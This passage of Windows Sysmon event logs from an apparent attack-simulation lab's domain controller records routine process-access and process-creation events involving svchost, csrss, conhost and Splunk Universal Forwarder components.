C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7C-5F25-0000-0010D21B0400}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7C-5F25-0000-0010D21B0400}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.632\r\nProcessGuid: {41C8662E-1F7D-5F25-0000-0010751D0400}\r\nProcessId: 3920\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.632","ProcessGuid":"{41C8662E-1F7D-5F25-0000-0010751D0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7D-5F25-0000-0010751D0400}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7D-5F25-0000-0010751D0400}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7D-5F25-0000-0010751D0400}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7D-5F25-0000-0010751D0400}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
